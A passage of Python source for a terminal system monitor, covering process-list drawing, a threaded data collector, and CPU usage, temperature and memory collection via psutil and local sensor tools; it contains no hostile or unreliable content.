if cls.selected == 0 and not killed and not "k" in Key.mouse: Key.mouse["k"] = [[dx + 13 + i, dy-1] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}k{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if dw > 39:
if cls.selected == 0 and not killed and not "i" in Key.mouse: Key.mouse["i"] = [[dx + 19 + i, dy-1] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}i{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if Graphs.detailed_cpu is NotImplemented or cls.resized:
Graphs.detailed_cpu = Graph(dgw+1, 7, THEME.gradient["cpu"], proc.details_cpu)
Graphs.detailed_mem = Graph(dw // 3, 1, None, proc.details_mem)
cls.select_max = cls.height - 11
y = cls.y + 9
h = cls.height - 10
else:
if cls.current_y != cls.y or cls.resized:
cls.current_y = cls.y
cls.current_h = cls.height
y, h = cls.y + 1, cls.height - 2
out_misc += (f'{Mv.to(y-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(y-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg(SUPERSCRIPT[cls.num])}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(y+7, x-1)}{THEME.proc_box(Symbol.v_line)}{Mv.r(w)}{THEME.proc_box(Symbol.v_line)}')
cls.select_max = cls.height - 3
sort_pos = x + w - len(CONFIG.proc_sorting) - 7
if not "left" in Key.mouse:
Key.mouse["left"] = [[sort_pos + i, y-1] for i in range(3)]
Key.mouse["right"] = [[sort_pos + len(CONFIG.proc_sorting) + 3 + i, y-1] for i in range(3)]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.h_line * (w - 9))}' +
("" if not proc.detailed else f"{Mv.to(dy+7, dgx + dgw + 1)}{THEME.proc_box(Symbol.div_down)}") +
f'{Mv.to(y-1, sort_pos)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("<")} {THEME.title(CONFIG.proc_sorting)} '
f'{THEME.hi_fg(">")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 29 + s_len:
if not "e" in Key.mouse: Key.mouse["e"] = [[sort_pos - 5 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, sort_pos - 6)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_tree else ""}'
f'{THEME.title("tre")}{THEME.hi_fg("e")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 37 + s_len:
if not "r" in Key.mouse: Key.mouse["r"] = [[sort_pos - 14 + i, y-1] for i in range(7)]
out_misc += (f'{Mv.to(y-1, sort_pos - 15)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_reversed else ""}'
f'{THEME.hi_fg("r")}{THEME.title("everse")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 47 + s_len:
if not "c" in Key.mouse: Key.mouse["c"] = [[sort_pos - 24 + i, y-1] for i in range(8)]
out_misc += (f'{Mv.to(y-1, sort_pos - 25)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_per_core else ""}'
f'{THEME.title("per-")}{THEME.hi_fg("c")}{THEME.title("ore")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if not "f" in Key.mouse or cls.resized: Key.mouse["f"] = [[x+6 + i, y-1] for i in range(6 if not proc.search_filter else 2 + len(proc.search_filter[-10:]))]
if proc.search_filter:
if not "delete" in Key.mouse: Key.mouse["delete"] = [[x+12 + len(proc.search_filter[-10:]) + i, y-1] for i in range(3)]
elif "delete" in Key.mouse:
del Key.mouse["delete"]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.title_left)}{Fx.b if cls.filtering or proc.search_filter else ""}{THEME.hi_fg("f")}{THEME.title}' +
("ilter" if not proc.search_filter and not cls.filtering else f' {proc.search_filter[-(10 if w < 83 else w - 74):]}{(Fx.bl + "█" + Fx.ubl) if cls.filtering else THEME.hi_fg(" del")}') +
f'{THEME.proc_box(Symbol.title_right)}')
main = THEME.inactive_fg if cls.selected == 0 else THEME.main_fg
hi = THEME.inactive_fg if cls.selected == 0 else THEME.hi_fg
title = THEME.inactive_fg if cls.selected == 0 else THEME.title
out_misc += (f'{Mv.to(y+h, x + 1)}{THEME.proc_box}{Symbol.h_line*(w-4)}'
f'{Mv.to(y+h, x+1)}{THEME.proc_box(Symbol.title_left)}{main}{Symbol.up} {Fx.b}{THEME.main_fg("select")} {Fx.ub}'
f'{THEME.inactive_fg if cls.selected == cls.select_max else THEME.main_fg}{Symbol.down}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{title}{Fx.b}info {Fx.ub}{main}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}')
if not "enter" in Key.mouse: Key.mouse["enter"] = [[x + 14 + i, y+h] for i in range(6)]
if w - len(loc_string) > 34:
if not "t" in Key.mouse: Key.mouse["t"] = [[x + 22 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}t{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 40:
if not "k" in Key.mouse: Key.mouse["k"] = [[x + 33 + i, y+h] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}k{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 51:
if not "i" in Key.mouse: Key.mouse["i"] = [[x + 39 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}i{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if CONFIG.proc_tree and w - len(loc_string) > 65:
if not " " in Key.mouse: Key.mouse[" "] = [[x + 50 + i, y+h] for i in range(12)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}spc {title}collapse{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
#* Processes labels
selected: str = CONFIG.proc_sorting
label: str
if selected == "memory": selected = "mem"
if selected == "threads" and not CONFIG.proc_tree and not arg_len: selected = "tr"
if CONFIG.proc_tree:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{" Tree:":<{tree_len-2}}' + (f'{"Threads: ":<9}' if tr_show else " "*4) + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected in ["pid", "program", "arguments"]: selected = "tree"
else:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{"Pid:":>7} {"Program:" if prog_len > 8 else "Prg:":<{prog_len}}' + (f'{"Arguments:":<{arg_len-4}}' if arg_len else "") +
((f'{"Threads:":<9}' if arg_len else f'{"Tr:":^5}') if tr_show else "") + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected == "program" and prog_len <= 8: selected = "prg"
selected = selected.split(" ")[0].capitalize()
if CONFIG.proc_mem_bytes: label = label.replace("Mem%", "MemB")
label = label.replace(selected, f'{Fx.u}{selected}{Fx.uu}')
out_misc += label
Draw.buffer("proc_misc", out_misc, only_save=True)
#* Detailed box draw
if proc.detailed:
if proc.details["status"] == psutil.STATUS_RUNNING: stat_color = Fx.b
elif proc.details["status"] in [psutil.STATUS_DEAD, psutil.STATUS_STOPPED, psutil.STATUS_ZOMBIE]: stat_color = f'{THEME.inactive_fg}'
else: stat_color = ""
expand = proc.expand
iw = (dw - 3) // (4 + expand)
iw2 = iw - 1
out += (f'{Mv.to(dy, dgx)}{Graphs.detailed_cpu(None if cls.moved or proc.details["killed"] else proc.details_cpu[-1])}'
f'{Mv.to(dy, dgx)}{THEME.title}{Fx.b}{0 if proc.details["killed"] else proc.details["cpu_percent"]}%{Mv.r(1)}{"" if SYSTEM == "MacOS" else (("C" if dgw < 20 else "Core") + str(proc.details["cpu_num"]))}')
for i, l in enumerate(["C", "P", "U"]):
out += f'{Mv.to(dy+2+i, dgx)}{l}'
for i, l in enumerate(["C", "M", "D"]):
out += f'{Mv.to(dy+4+i, dx+1)}{l}'
out += (f'{Mv.to(dy, dx+1)} {"Status:":^{iw}.{iw2}}{"Elapsed:":^{iw}.{iw2}}' +
(f'{"Parent:":^{iw}.{iw2}}' if dw > 28 else "") + (f'{"User:":^{iw}.{iw2}}' if dw > 38 else "") +
(f'{"Threads:":^{iw}.{iw2}}' if expand > 0 else "") + (f'{"Nice:":^{iw}.{iw2}}' if expand > 1 else "") +
(f'{"IO Read:":^{iw}.{iw2}}' if expand > 2 else "") + (f'{"IO Write:":^{iw}.{iw2}}' if expand > 3 else "") +
(f'{"TTY:":^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+1, dx+1)}{Fx.ub}{THEME.main_fg}{stat_color}{proc.details["status"]:^{iw}.{iw2}}{Fx.ub}{THEME.main_fg}{proc.details["uptime"]:^{iw}.{iw2}} ' +
(f'{proc.details["parent_name"]:^{iw}.{iw2}}' if dw > 28 else "") + (f'{proc.details["username"]:^{iw}.{iw2}}' if dw > 38 else "") +
(f'{proc.details["threads"]:^{iw}.{iw2}}' if expand > 0 else "") + (f'{proc.details["nice"]:^{iw}.{iw2}}' if expand > 1 else "") +
(f'{proc.details["io_read"]:^{iw}.{iw2}}' if expand > 2 else "") + (f'{proc.details["io_write"]:^{iw}.{iw2}}' if expand > 3 else "") +
(f'{proc.details["terminal"][-(iw2):]:^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+3, dx)}{THEME.title}{Fx.b}{("Memory: " if dw > 42 else "M:") + str(round(proc.details["memory_percent"], 1)) + "%":>{dw//3-1}}{Fx.ub} {THEME.inactive_fg}{"⡀"*(dw//3)}'
f'{Mv.l(dw//3)}{THEME.proc_misc}{Graphs.detailed_mem(None if cls.moved else proc.details_mem[-1])} '
f'{THEME.title}{Fx.b}{proc.details["memory_bytes"]:.{dw//3 - 2}}{THEME.main_fg}{Fx.ub}')
cy = dy + (4 if len(proc.details["cmdline"]) > dw - 5 else 5)
for i in range(ceil(len(proc.details["cmdline"]) / (dw - 5))):
out += f'{Mv.to(cy+i, dx + 3)}{proc.details["cmdline"][((dw-5)*i):][:(dw-5)]:{"^" if i == 0 else "<"}{dw-5}}'
if i == 2: break
#* Checking for selection out of bounds
if cls.start > proc.num_procs - cls.select_max + 1 and proc.num_procs > cls.select_max: cls.start = proc.num_procs - cls.select_max + 1
elif cls.start > proc.num_procs: cls.start = proc.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > proc.num_procs and proc.num_procs < cls.select_max: cls.selected = proc.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
#* Start iteration over all processes and info
cy = 1
for n, (pid, items) in enumerate(proc.processes.items(), start=1):
if n < cls.start: continue
l_count += 1
if l_count == cls.selected:
is_selected = True
cls.selected_pid = pid
else: is_selected = False
indent, name, cmd, threads, username, mem, mem_b, cpu = [items.get(v, d) for v, d in [("indent", ""), ("name", ""), ("cmd", ""), ("threads", 0), ("username", "?"), ("mem", 0.0), ("mem_b", 0), ("cpu", 0.0)]]
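#* Tree view: fit indent + pid into tree_len and, when space allows, show the command binary in parentheses if it differs from the process name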
if CONFIG.proc_tree:
arg_len = 0
offset = tree_len - len(f'{indent}{pid}')
if offset < 1: offset = 0
indent = f'{indent:.{tree_len - len(str(pid))}}'
if offset - len(name) > 12:
cmd = cmd.split(" ")[0].split("/")[-1]
if not cmd.startswith(name):
offset = len(name)
arg_len = tree_len - len(f'{indent}{pid} {name} ') + 2
cmd = f'({cmd[:(arg_len-4)]})'
else:
offset = prog_len - 1
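#* Keep a small per-process cpu graph: created once usage passes 1% and removed again after 10 consecutive updates below 1%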
if cpu > 1.0 or pid in Graphs.pid_cpu:
if pid not in Graphs.pid_cpu:
Graphs.pid_cpu[pid] = Graph(5, 1, None, [0])
cls.pid_counter[pid] = 0
elif cpu < 1.0:
cls.pid_counter[pid] += 1
if cls.pid_counter[pid] > 10:
del cls.pid_counter[pid], Graphs.pid_cpu[pid]
else:
cls.pid_counter[pid] = 0
end = f'{THEME.main_fg}{Fx.ub}' if CONFIG.proc_colors else Fx.ub
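#* calc = distance from the selected row (or from the top when nothing is selected), used to fade the gradient colors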
if cls.selected > cy: calc = cls.selected - cy
elif 0 < cls.selected <= cy: calc = cy - cls.selected
else: calc = cy
if CONFIG.proc_colors and not is_selected:
vals = []
for v in [int(cpu), int(mem), int(threads // 3)]:
if CONFIG.proc_gradient:
val = ((v if v <= 100 else 100) + 100) - calc * 100 // cls.select_max
vals += [f'{THEME.gradient["proc_color" if val < 100 else "process"][val if val < 100 else val - 100]}']
else:
vals += [f'{THEME.gradient["process"][v if v <= 100 else 100]}']
c_color, m_color, t_color = vals
else:
c_color = m_color = t_color = Fx.b
if CONFIG.proc_gradient and not is_selected:
g_color = f'{THEME.gradient["proc"][calc * 100 // cls.select_max]}'
if is_selected:
c_color = m_color = t_color = g_color = end = ""
out += f'{THEME.selected_bg}{THEME.selected_fg}{Fx.b}'
#* Creates one line for a process with all gathered information
out += (f'{Mv.to(y+cy, x)}{g_color}{indent}{pid:>{(1 if CONFIG.proc_tree else 7)}} ' +
f'{c_color}{name:<{offset}.{offset}} {end}' +
(f'{g_color}{cmd:<{arg_len}.{arg_len-1}}' if arg_len else "") +
(t_color + (f'{threads:>4} ' if threads < 1000 else "999> ") + end if tr_show else "") +
(g_color + (f'{username:<9.9}' if len(username) < 10 else f'{username[:8]:<8}+') if usr_show else "") +
m_color + ((f'{mem:>4.1f}' if mem < 100 else f'{mem:>4.0f} ') if not CONFIG.proc_mem_bytes else f'{floating_humanizer(mem_b, short=True):>4.4}') + end +
f' {THEME.inactive_fg}{"⡀"*5}{THEME.main_fg}{g_color}{c_color}' + (f' {cpu:>4.1f} ' if cpu < 100 else f'{cpu:>5.0f} ') + end +
(" " if proc.num_procs > cls.select_max else ""))
#* Draw small cpu graph for process if cpu usage was above 1% in the last 10 updates
if pid in Graphs.pid_cpu:
out += f'{Mv.to(y+cy, x + w - (12 if proc.num_procs > cls.select_max else 11))}{c_color if CONFIG.proc_colors else THEME.proc_misc}{Graphs.pid_cpu[pid](None if cls.moved else round(cpu))}{THEME.main_fg}'
if is_selected: out += f'{Fx.ub}{Term.fg}{Term.bg}{Mv.to(y+cy, x + w - 1)}{" " if proc.num_procs > cls.select_max else ""}'
cy += 1
if cy == h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+cy+i, x)}{" " * w}'
#* Draw scrollbar if needed
if proc.num_procs > cls.select_max:
if cls.resized:
Key.mouse["mouse_scroll_up"] = [[x+w-2+i, y] for i in range(3)]
Key.mouse["mouse_scroll_down"] = [[x+w-2+i, y+h-1] for i in range(3)]
scroll_pos = round(cls.start * (cls.select_max - 2) / (proc.num_procs - (cls.select_max - 2)))
if scroll_pos < 0 or cls.start == 1: scroll_pos = 0
elif scroll_pos > h - 3 or cls.start >= proc.num_procs - cls.select_max: scroll_pos = h - 3
out += (f'{Mv.to(y, x+w-1)}{Fx.b}{THEME.main_fg}↑{Mv.to(y+h-1, x+w-1)}↓{Fx.ub}'
f'{Mv.to(y+1+scroll_pos, x+w-1)}█')
elif "scroll_up" in Key.mouse:
del Key.mouse["scroll_up"], Key.mouse["scroll_down"]
#* Draw current selection and number of processes
out += (f'{Mv.to(y+h, x + w - 3 - len(loc_string))}{THEME.proc_box}{Symbol.title_left}{THEME.title}'
f'{Fx.b}{loc_string}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
#* Clean up dead processes graphs and counters
cls.count += 1
if cls.count == 100:
cls.count = 0
for p in list(cls.pid_counter):
if not psutil.pid_exists(p):
del cls.pid_counter[p], Graphs.pid_cpu[p]
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = cls.moved = False
class Collector:
'''Data collector master class
* .start(): Starts collector thread
* .stop(): Stops collector thread
* .collect(*collectors: Collector, draw_now: bool = True, interrupt: bool = False): queues up collectors to run'''
stopping: bool = False
started: bool = False
draw_now: bool = False
redraw: bool = False
only_draw: bool = False
thread: threading.Thread
collect_run = threading.Event()
collect_idle = threading.Event()
collect_idle.set()
collect_done = threading.Event()
collect_queue: List = []
collect_interrupt: bool = False
proc_interrupt: bool = False
use_draw_list: bool = False
proc_counter: int = 1
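#* collect_run wakes the collector thread, collect_idle signals it is ready for a new queue and collect_done signals a finished pass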
@classmethod
def start(cls):
cls.stopping = False
cls.thread = threading.Thread(target=cls._runner, args=())
cls.thread.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.thread.is_alive():
cls.stopping = True
cls.started = False
cls.collect_queue = []
cls.collect_idle.set()
cls.collect_done.set()
try:
cls.thread.join()
except:
pass
@classmethod
def _runner(cls):
'''This is meant to run in its own thread, collecting and drawing when collect_run is set'''
draw_buffers: List[str] = []
debugged: bool = False
try:
while not cls.stopping:
if CONFIG.draw_clock and CONFIG.update_ms != 1000: Box.draw_clock()
cls.collect_run.wait(0.1)
if not cls.collect_run.is_set():
continue
draw_buffers = []
cls.collect_interrupt = False
cls.collect_run.clear()
cls.collect_idle.clear()
cls.collect_done.clear()
if DEBUG and not debugged: TimeIt.start("Collect and draw")
while cls.collect_queue:
collector = cls.collect_queue.pop()
if not cls.only_draw:
collector._collect()
collector._draw()
if cls.use_draw_list: draw_buffers.append(collector.buffer)
if cls.collect_interrupt: break
if DEBUG and not debugged: TimeIt.stop("Collect and draw"); debugged = True
if cls.draw_now and not Menu.active and not cls.collect_interrupt:
if cls.use_draw_list: Draw.out(*draw_buffers)
else: Draw.out()
if CONFIG.draw_clock and CONFIG.update_ms == 1000: Box.draw_clock()
cls.collect_idle.set()
cls.collect_done.set()
except Exception as e:
errlog.exception(f'Data collection thread failed with exception: {e}')
cls.collect_idle.set()
cls.collect_done.set()
clean_quit(1, thread=True)
@classmethod
def collect(cls, *collectors, draw_now: bool = True, interrupt: bool = False, proc_interrupt: bool = False, redraw: bool = False, only_draw: bool = False):
'''Setup collect queue for _runner'''
cls.collect_interrupt = interrupt
cls.proc_interrupt = proc_interrupt
cls.collect_idle.wait()
cls.collect_interrupt = False
cls.proc_interrupt = False
cls.use_draw_list = False
cls.draw_now = draw_now
cls.redraw = redraw
cls.only_draw = only_draw
if collectors:
cls.collect_queue = [*collectors]
cls.use_draw_list = True
if ProcCollector in cls.collect_queue:
cls.proc_counter = 1
else:
cls.collect_queue = list(cls.__subclasses__())
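#* With proc_update_mult > 1 the process list is only collected every proc_update_mult:th cycle to save cpu time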
if CONFIG.proc_update_mult > 1:
if cls.proc_counter > 1:
cls.collect_queue.remove(ProcCollector)
if cls.proc_counter == CONFIG.proc_update_mult:
cls.proc_counter = 0
cls.proc_counter += 1
cls.collect_run.set()
class CpuCollector(Collector):
'''Collects cpu usage for cpu and cores, cpu frequency, load_avg, uptime and cpu temps'''
cpu_usage: List[List[int]] = []
cpu_temp: List[List[int]] = []
cpu_temp_high: int = 0
cpu_temp_crit: int = 0
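#* Index 0 holds the total cpu value, followed by one list per logical core/thread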
for _ in range(THREADS + 1):
cpu_usage.append([])
cpu_temp.append([])
freq_error: bool = False
cpu_freq: int = 0
load_avg: List[float] = []
uptime: str = ""
buffer: str = CpuBox.buffer
sensor_method: str = ""
got_sensors: bool = False
sensor_swap: bool = False
cpu_temp_only: bool = False
@classmethod
def get_sensors(cls):
'''Check if we can get cpu temps and return method of getting temps'''
cls.sensor_method = ""
if SYSTEM == "MacOS":
try:
if which("coretemp") and subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip().replace("-", "").isdigit():
cls.sensor_method = "coretemp"
elif which("osx-cpu-temp") and subprocess.check_output("osx-cpu-temp", universal_newlines=True).rstrip().endswith("°C"):
cls.sensor_method = "osx-cpu-temp"
except: pass
elif CONFIG.cpu_sensor != "Auto" and CONFIG.cpu_sensor in CONFIG.cpu_sensors:
cls.sensor_method = "psutil"
elif hasattr(psutil, "sensors_temperatures"):
try:
temps = psutil.sensors_temperatures()
if temps:
for name, entries in temps.items():
if name.lower().startswith("cpu"):
cls.sensor_method = "psutil"
break
for entry in entries:
if entry.label.startswith(("Package", "Core 0", "Tdie", "CPU")):
cls.sensor_method = "psutil"
break
except: pass
if not cls.sensor_method and SYSTEM == "Linux":
try:
if which("vcgencmd") and subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip().endswith("'C"):
cls.sensor_method = "vcgencmd"
except: pass
cls.got_sensors = bool(cls.sensor_method)
@classmethod
def _collect(cls):
cls.cpu_usage[0].append(round(psutil.cpu_percent(percpu=False)))
if len(cls.cpu_usage[0]) > Term.width * 4:
del cls.cpu_usage[0][0]
for n, thread in enumerate(psutil.cpu_percent(percpu=True), start=1):
cls.cpu_usage[n].append(round(thread))
if len(cls.cpu_usage[n]) > Term.width * 2:
del cls.cpu_usage[n][0]
try:
if hasattr(psutil.cpu_freq(), "current"):
cls.cpu_freq = round(psutil.cpu_freq().current)
except Exception as e:
if not cls.freq_error:
cls.freq_error = True
errlog.error("Exception while getting cpu frequency!")
errlog.exception(f'{e}')
cls.load_avg = [round(lavg, 2) for lavg in os.getloadavg()]
cls.uptime = str(timedelta(seconds=round(time()-psutil.boot_time(),0)))[:-3]
if CONFIG.check_temp and cls.got_sensors:
cls._collect_temps()
@classmethod
def _collect_temps(cls):
temp: int = 1000
cores: List[int] = []
core_dict: Dict[int, int] = {}
entry_int: int = 0
cpu_type: str = ""
c_max: int = 0
s_name: str = "_-_"
s_label: str = "_-_"
if cls.sensor_method == "psutil":
try:
if CONFIG.cpu_sensor != "Auto":
s_name, s_label = CONFIG.cpu_sensor.split(":", 1)
for name, entries in psutil.sensors_temperatures().items():
for num, entry in enumerate(entries, 1):
if name == s_name and (entry.label == s_label or str(num) == s_label) and round(entry.current) > 0:
if entry.label.startswith("Package"):
cpu_type = "intel"
elif entry.label.startswith("Tdie"):
cpu_type = "ryzen"
else:
cpu_type = "other"
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
temp = round(entry.current)
elif entry.label.startswith(("Package", "Tdie")) and cpu_type in ["", "other"] and s_name == "_-_" and hasattr(entry, "current") and round(entry.current) > 0:
if not cls.cpu_temp_high or cls.sensor_swap or cpu_type == "other":
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 95
cpu_type = "intel" if entry.label.startswith("Package") else "ryzen"
temp = round(entry.current)
elif (entry.label.startswith(("Core", "Tccd", "CPU")) or (name.lower().startswith("cpu") and not entry.label)) and hasattr(entry, "current") and round(entry.current) > 0:
if entry.label.startswith(("Core", "Tccd")):
entry_int = int(entry.label.replace("Core", "").replace("Tccd", ""))
if entry_int in core_dict and cpu_type != "ryzen":
if c_max == 0:
c_max = max(core_dict) + 1
if c_max < THREADS // 2 and (entry_int + c_max) not in core_dict:
core_dict[(entry_int + c_max)] = round(entry.current)
continue
elif entry_int in core_dict:
continue
core_dict[entry_int] = round(entry.current)
continue
elif cpu_type in ["intel", "ryzen"]:
continue
if not cpu_type:
cpu_type = "other"
if not cls.cpu_temp_high or cls.sensor_swap:
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 60 if name == "cpu_thermal" else 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 80 if name == "cpu_thermal" else 95
temp = round(entry.current)
cores.append(round(entry.current))
if core_dict:
if not temp or temp == 1000:
temp = sum(core_dict.values()) // len(core_dict)
if not cls.cpu_temp_high or not cls.cpu_temp_crit:
cls.cpu_temp_high, cls.cpu_temp_crit = 80, 95
cls.cpu_temp[0].append(temp)
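#* Ryzen exposes one Tccd temperature per CCD, so each thread gets the temperature of the CCD its core belongs to (best-effort mapping based on CORES // number of CCDs)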
if cpu_type == "ryzen":
ccds: int = len(core_dict)
cores_per_ccd: int = CORES // ccds
z: int = 1
for x in range(THREADS):
if x == CORES:
z = 1
if CORE_MAP[x] + 1 > cores_per_ccd * z:
z += 1
if z in core_dict:
cls.cpu_temp[x+1].append(core_dict[z])
else:
for x in range(THREADS):
if CORE_MAP[x] in core_dict:
cls.cpu_temp[x+1].append(core_dict[CORE_MAP[x]])
elif len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cls.cpu_temp[0].append(temp)
if len(cores) > 1:
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
try:
if cls.sensor_method == "coretemp":
temp = max(0, int(subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip()))
cores = [max(0, int(x)) for x in subprocess.check_output("coretemp", universal_newlines=True).split()]
if len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cores.insert(0, temp)
for n, t in enumerate(cores):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "osx-cpu-temp":
temp = max(0, round(float(subprocess.check_output("osx-cpu-temp", universal_newlines=True).strip()[:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "vcgencmd":
temp = max(0, round(float(subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip()[5:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 60
cls.cpu_temp_crit = 80
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
if not cores:
cls.cpu_temp[0].append(temp)
if not core_dict and len(cores) <= 1:
cls.cpu_temp_only = True
if len(cls.cpu_temp[0]) > 5:
for n in range(len(cls.cpu_temp)):
if cls.cpu_temp[n]:
del cls.cpu_temp[n][0]
@classmethod
def _draw(cls):
CpuBox._draw_fg()
class MemCollector(Collector):
'''Collects memory and disks information'''
values: Dict[str, int] = {}
vlist: Dict[str, List[int]] = {}
percent: Dict[str, int] = {}
string: Dict[str, str] = {}
swap_values: Dict[str, int] = {}
swap_vlist: Dict[str, List[int]] = {}
swap_percent: Dict[str, int] = {}
swap_string: Dict[str, str] = {}
disks: Dict[str, Dict]
disk_hist: Dict[str, Tuple] = {}
timestamp: float = time()
io_error: bool = False
old_disks: List[str] = []
fstab_filter: List[str] = []
excludes: List[str] = ["squashfs", "nullfs"]
if SYSTEM == "BSD": excludes += ["devfs", "tmpfs", "procfs", "linprocfs", "gvfs", "fusefs"]
buffer: str = MemBox.buffer
@classmethod
def _collect(cls):
#* Collect memory
mem = psutil.virtual_memory()
if hasattr(mem, "cached"):
cls.values["cached"] = mem.cached
else:
cls.values["cached"] = mem.active
cls.values["total"], cls.values["free"], cls.values["available"] = mem.total, mem.free, mem.available
cls.values["used"] = cls.values["total"] - cls.values["available"]
for key, value in cls.values.items():
cls.string[key] = floating_humanizer(value)
if key == "total": continue
cls.percent[key] = round(value * 100 / cls.values["total"])
if CONFIG.mem_graphs:
if not key in cls.vlist: cls.vlist[key] = []
cls.vlist[key].append(cls.percent[key])
if len(cls.vlist[key]) > MemBox.width: del cls.vlist[key][0]
#* Collect swap
if CONFIG.show_swap or CONFIG.swap_disk:
swap = psutil.swap_memory()
cls.swap_values["total"], cls.swap_values["free"] = swap.total, swap.free
cls.swap_values["used"] = cls.swap_values["total"] - cls.swap_values["free"]
if swap.total:
if not MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = True
for key, value in cls.swap_values.items():
cls.swap_string[key] = floating_humanizer(value)
if key == "total": continue
cls.swap_percent[key] = round(value * 100 / cls.swap_values["total"])
if CONFIG.mem_graphs:
if not key in cls.swap_vlist: cls.swap_vlist[key] = []
cls.swap_vlist[key].append(cls.swap_percent[key])
if len(cls.swap_vlist[key]) > MemBox.width: del cls.swap_vlist[key][0]
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
if not CONFIG.show_disks: return
#* Collect disks usage
disk_read: int = 0
disk_write: int = 0
dev_name: str
disk_name: str
filtering: Tuple = ()
filter_exclude: bool = False
io_string: str
u_percent: int
disk_list: List[str] = []
cls.disks = {}
if CONFIG.disks_filter:
if CONFIG.disks_filter.startswith("exclude="):
filter_exclude = True
filtering = tuple(v.strip() for v in CONFIG.disks_filter.replace("exclude=", "").strip().split(","))
else:
filtering = tuple(v.strip() for v in CONFIG.disks_filter.strip().split(","))
try:
io_counters = psutil.disk_io_counters(perdisk=SYSTEM == "Linux", nowrap=True)
except ValueError as e:
if not cls.io_error:
